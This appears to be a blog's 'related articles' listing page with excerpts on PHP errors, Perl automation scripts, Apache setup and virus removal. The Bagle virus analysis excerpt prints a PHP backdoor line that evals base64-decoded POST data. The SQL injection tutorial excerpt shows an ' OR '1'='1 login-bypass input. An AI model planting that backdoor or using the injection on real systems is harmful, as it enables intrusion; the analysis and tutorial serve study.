14 Aug, 2010

404 errors with get parameters on codeigniter

Articles related to 404 errors with get parameters on codeigniter

Solve "Cannot modify header information - headers already sent by *.php"

http://digitalpbk.com/php/warning-cannot-modify-header-information-headers-already-sent Solve  "Cannot modify header information - headers already sent by *.php" this warning by turning the error_reporting to OFF using error_reporting(0);, which is pretty much the not way of doing things. In HTTP Headers are sent before the actual content so if you are going to use header function after outputting the contents, it is likely to not work. How do I solve this Warning Cannont Modify Header Information ? In order to solve this issue you have to make sure you dont echo or print any output before using header or setcookie function. Make sure the control passes through ...
Published 1 year, 10 months ago

PHP Code Analysis of Bagle Virus

http://digitalpbk.blogspot.com/2009/10/bagle-virus-analysis-php-code.html ($a == 'default output handler' ? false : $a); for ($i = count ($s) - 1; $i >= 0; $i--) { $s[$i][1] = ob_get_contents (); ob_end_clean (); } ob_start ('b0sr'); for ($i = 0; $i { ob_start ($s[$i][0]); echo $s[$i][1]; } } }$b0srl = (($a = @set_error_handler ('b0sr2')) != 'b0sr2') ? $a : 0;eval (base64_decode ($_POST['e'])); ...
Published 2 years, 3 months ago

Orkut Perl Script - Login, Scrapper and more

http://digitalpbk.blogspot.com/2007/06/orkut-mass-scrapper-scrap-all-friends.html print_c{ print ""; print "> "; print "";}sub login{ print "\nGmail iD : "; $email = ; print "Password : "; $pass = ; print $prc[0]; chomp $email;chomp $pass;RELOGIN: for($i=3; $i>=0;$i--) { printf("%-60s","GET /Home.aspx"); $mech->get("http://www.orkut.com/Home.aspx"); last if($mech->success()); printf("%10s",$prc[1]); print " Retry (",$i,")".$prc[0] if($i); } return if ...
Published 4 years, 7 months ago

SQL Injection: Tutorial Part 1

http://digitalpbk.blogspot.com/2009/06/hacking-sql-injection-tutorial.html injection hole, all an user has to do is add a ' (single quote) to the username and/or password fields, sayuser=digitalpbkpass=password'Now the SQL query would be constructed as SELECT * FROM users WHERE user='digitalpbk' AND pass='password''This will throw up an invalid SQL and if the errors are not supressed you will get a screen as shown below:So if we modify the user input field pass such thatuser=digitalpbkpass=password' OR '1'='1,the constructed SQL ...
Published 2 years, 7 months ago

Setting up Apache-PHP on windows.

http://digitalpbk.blogspot.com/2006/12/setting-up-apache-php-on-windows.html who can get stuff from this server.# Order allow,deny Allow from allSo C:\public_html\ is the server root. ie http://localhost/ = C:\public_html.After this is done test the configuration by executing (command line):C:\Apache2\bin>apache -tIf the syntax is right you will get a "Syntax OK" message.Step 4 : Installing phpTo install php, just extract or copy the "PHP" folder to C:\Apache2\ so that C:\Apache2\PHP is created.Step 5 : configuring PHPCopy ...
Published 5 years, 1 month ago

Perl Script to send Free SMS to any mobile number in INDIA using way2sms

http://digitalpbk.com/perl-sms/perl-script-send-free-sms-any-mobile-number-india-using-way2sms Perl Script to send Free SMS to any mobile number in INDIA using way2sms The following script sends SMS to any number in INDIA using the free service provided by Way2Sms.com Requires WWW::Mechanize and Compress::Zlib libraries. Please remember to fill the username and password in the fields that is mentioned in the script. Updated code on 28th October 2011. If you face errors use the new script. #!/usr/bin/perl use WWW::Mechanize; use Compress::Zlib; my $mech ...
Published 2 years, 2 months ago

Network Traffic Calculator using VC++ 6 on XP

http://digitalpbk.blogspot.com/2006/11/network-traffic-calculator-using-vc-6.html Res = WSAIoctl(Sock, SIO_GET_INTERFACE_LIST,0, 0,&buffer;, 1024, &lnBytesReturned;,0, 0); if(lnRes) return WSAGetLastError(); for(int i=0u;i76;i++)> { if(i } closesocket(Sock); return 0;}int ConnectSock(char sck[],int port,HWND hwnd){ WORD wVs = MAKEWORD(2,2); WSADATA wsaData; int err=WSAStartup(wVs,&wsaData;); if(err!=0) return INVALID_SOCKET; SOCKADDR_IN sin; sin.sin_family = AF_INET; sin.sin_port = htons(port); if(sin.sin_port == INVALID_SOCKET) return INVALID_SOCKET; unsigned long iret ...
Published 5 years, 2 months ago

Install Wireless Wifi drivers on Sony Vaio CW on Linux Ubuntu

http://digitalpbk.com/ubuntu/install-wireless-wifi-drivers-linux-karmic-9.1-sony-vaio-cw Install Wireless Wifi drivers on Sony Vaio CW on Linux Ubuntu Out of the box Ubuntu 9.10 wireless/wifi did not work on my Sony Vaio CW Series (VPCCW26FG), The following error message is shown on start up and on dmesg command. Could not read microcode: -2 The solution was to install backports modules. Installing Wireless Drivers on Ubuntu In order to make wireless (WiFi) work on the new Sony Vaio CW series, you have to run the following commands on Ubuntu 9.10 Karmic. sudo apt-get clean ...
Published 1 year, 10 months ago

jwgkvsq.vmx - Conficker virus manual removal

http://digitalpbk.blogspot.com/2009/04/jwgkvsqvmx-conficker-virus-manual.html "zbtthjd")Now goto HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\zbtthjd\Parameters, note the ServiceDLL Parameter, It would be something like c:\windows\system32\.dllTake a Command prompt and runsvchost -k netsvcs. This should stop the netsvcs and the virus.Try deleting the DLL file or else rename the DLL file to something elseRestart the System.Renable Services Automatic Updates and BITS.Note if you find these methods not applicable in your case, the virus must have morphed to some other form ...
Published 2 years, 10 months ago

Automate Rsync without Password using Rsync Daemon

http://digitalpbk.com/linux/automate-rsync-passwordless-daemon-rsyncd-conf-cron _Name] path = Filesystem_Path comment = Comment auth users = Authenticated_Users secrets file = User_Password_file hosts allow = IP_Addresses The parameters as shown in italics have to be edited. Module_Name : A name to the module Filesystem_Path : The folder that is to be synced Comment : A comment about the entry Authenticated_Users : List of users separated by space who can access the module / path User_Password_file : The location of the file containing ...
Published 1 year, 12 months ago

Related help topics for 404 errors with get parameters on codeigniter More keywords like 404 errors with get parameters on codeigniter
More pages for 404 errors with get parameters on codeigniter


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Like a batman guarding his boat @ Elephant Beach Havelock Like a batman guarding his boat @ Elephant Beach Havelock in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk